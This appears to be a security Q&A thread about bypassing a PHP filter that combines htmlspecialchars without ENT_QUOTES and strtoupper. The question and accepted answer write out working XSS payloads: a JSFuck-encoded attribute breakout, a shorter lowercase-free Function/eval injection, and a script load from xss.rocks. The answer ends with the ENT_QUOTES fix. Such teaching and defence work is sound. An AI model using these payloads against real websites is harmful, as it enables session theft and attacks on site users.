# XSS bypass strtoupper & htmlspecialchars

Tags: php, xss

I've looked into a bit of pentesting but the following is eluding me, I think I've got it but I can't get it to trigger!

Trying to bypass the following:

```
$strippedID = htmlspecialchars($ID);
$NEWID = strtoupper($strippedID);
...
echo "Tag ID: <input type='text' value='".$NEWID."'>";
```

So far I've tried:

```
test-xss.php?id=%27%20onload=%27javascript:alert(`XSS`)
```

This doesn't work because the alert function is changed to uppercase, and so an error is thrown in the console. I've also tried encoding the whole request parameters.

```
test-xss.php?id=x%27%3E%3CSCRIPT%20SRC=http://xss.rocks/xss.js%3E%3C/SCRIPT%3E%3Ci%20z=%27x
```

and this doesn't seem to want to work because even though the <> are encoded they still seem to come out as & lt;  and & gt;

Maybe only attack is charset UTF-7?

Any ideas?

Answer (score 18, accepted):

Your parameter `$ID` is printed inside an HTML tag attribute value. Unfortunately, it's run through [`htmlspecialchars()`](https://secure.php.net/manual/en/function.htmlspecialchars.php) which is supposed to encode HTML-significant characters. Since the function doesn't have the `ENT_QUOTES` flag set, it will escape `<`, `>`, `&`, `"`, but not `'` (single quotes). Lucky for you, the value is enclosed by such single quotes, so you can use `'` to break out of the attribute.

Next, you'd want to close the tag and start a new one (e.g. `<script>`) but `htmlspecialchars()` doesn't let you (as it escapes `>` and `<`). So instead, you have to use an event handler that works for `<input>` tags. The `onload` event handler doesn't apply to input boxes but you can use others, e.g.`onmouseover`. (The side effect is that you will need minimal user interaction to trigger the XSS, or need to take advantage of additional attributes [like `autofocus`](https://security.stackexchange.com/a/97555/95381) to have it triggered immediately on page load.)

So we have this:

```
<input type='text' value='' onmouseover='(javascript payload)'>
                          |-------------- $ID --------------|
```

Now, you can't just use plain JS like `alert(1)` as the payload since the value also runs through [`strtoupper()`](https://secure.php.net/manual/en/function.strtoupper.php) that would capitalize the function name to `ALERT(1)` which is invalid. Instead, you need to find JS code that works with capitals only, or even better, without any letters at all. For that you can use a tool like [JSFuck](http://www.jsfuck.com/) that translates any JS code into an equivalent representation without any letters.

For example, `alert(1)` becomes:

```
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
```

So, this would be a working XSS PoC:

```
' onmouseover='[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
```

If using JSFuck is impractical for you (e.g. due to URL length restrictions as @chefarov remarked) there are other techniques that work without lowercase letters. E.g., the attribute value can be put entirely as HTML entities so that the `a` of `alert` is written as `&#X61;` and so on. (In your specific scenario you can't use this because `htmlspecialchars()` would also escape any `&`.)

However, here's a PoC of a shorter payload that avoids lowercase letters:

```
xss.php?xss='+autofocus+onfocus=U%3D[][[]]%2B''%3BY%3D[][U[4]%2BU[5]%2BU[6]%2BU[8]]%3BX%3DY%2B''%3BT%3D(!![]%2B'')%3BF%3D(![]%2B'')%3BZ%3DU[8]%2BU[3]%2BX[30]%2BX[31]%2BU[8]%2BU[3]%2B'URI'%3BG%3DY[X[3]%2BX[6]%2BX[2]%2BF[3]%2BT[0]%2BT[1]%2BT[2]%2BX[3]%2BT[0]%2BX[31]%2BT[1]]%3BG(U[3]%2BX[27]%2BF[1]%2BF[2]%2B'('%2BZ%2B'(`%2561%256C%2565%2572%2574%2528%2527%2578%2573%2573%2527%2529`))')()//
```

(I'm essentially assembling `Function(eval(decodeURI(...)))` without lowercase letters and can then feed it the actual payload URL-encoded (e.g. `a` => `%61`) which never requires lowercase letters.)

---

### The fix

You should encode both double and single quotes by adding the `ENT_QUOTES` flag:

```
$NEWID = strtoupper(htmlspecialchars($ID, ENT_QUOTES));
```

Comment: Finding htmlspecialchars too much effort to type, I make a function with a shorter name, and force ENT_QUOTES. doing the right thing should be easy, not hard.  `function hsc($s){ return  htmlspecialchars($s, ENT_QUOTES));}`

Comment: nice answer. However using jsfuck is unrealistic, since any useful JS (instead of alert), will produce too long URI causing a 414 response

Comment: @chefarov Good point. I added an approach that doesn't invlove JSFuck to the answer.

Comment: @Arminius Thanks for your reply. If I encode the payload to HTML entities and test on the question's example it will print empty string on `value`. If I try HEX-coded payload, it will decode the payload and print the evaluated text as upper case. The browsers are evolving and diverging too fast so I assume that's always try & error situations. Anyway good to know that there is an `ENT_QUOTES` argument.

Comment: @chefarov My bad, I forgot that `htmlentities()` encodes `&#X61;` to `&amp;#X61;` making that approach unfeasible. But as a proof of concept, I outlined yet another technique that's inspired by JSFuck but much shorter.

Comment: finally if we are trying to break something which has a function htmlspecialchars($data, ENT_QUOTES); then it is impossible to break it? right. because I have been stuck from past 2 days with the bwapp high level challenge of html injection with get method. So If any hint will be very very valuable to me.